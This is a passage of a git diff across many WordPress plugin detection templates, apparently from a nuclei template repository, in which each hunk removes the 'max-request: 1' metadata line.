     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 6b0ed799ef..ba558305a4 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
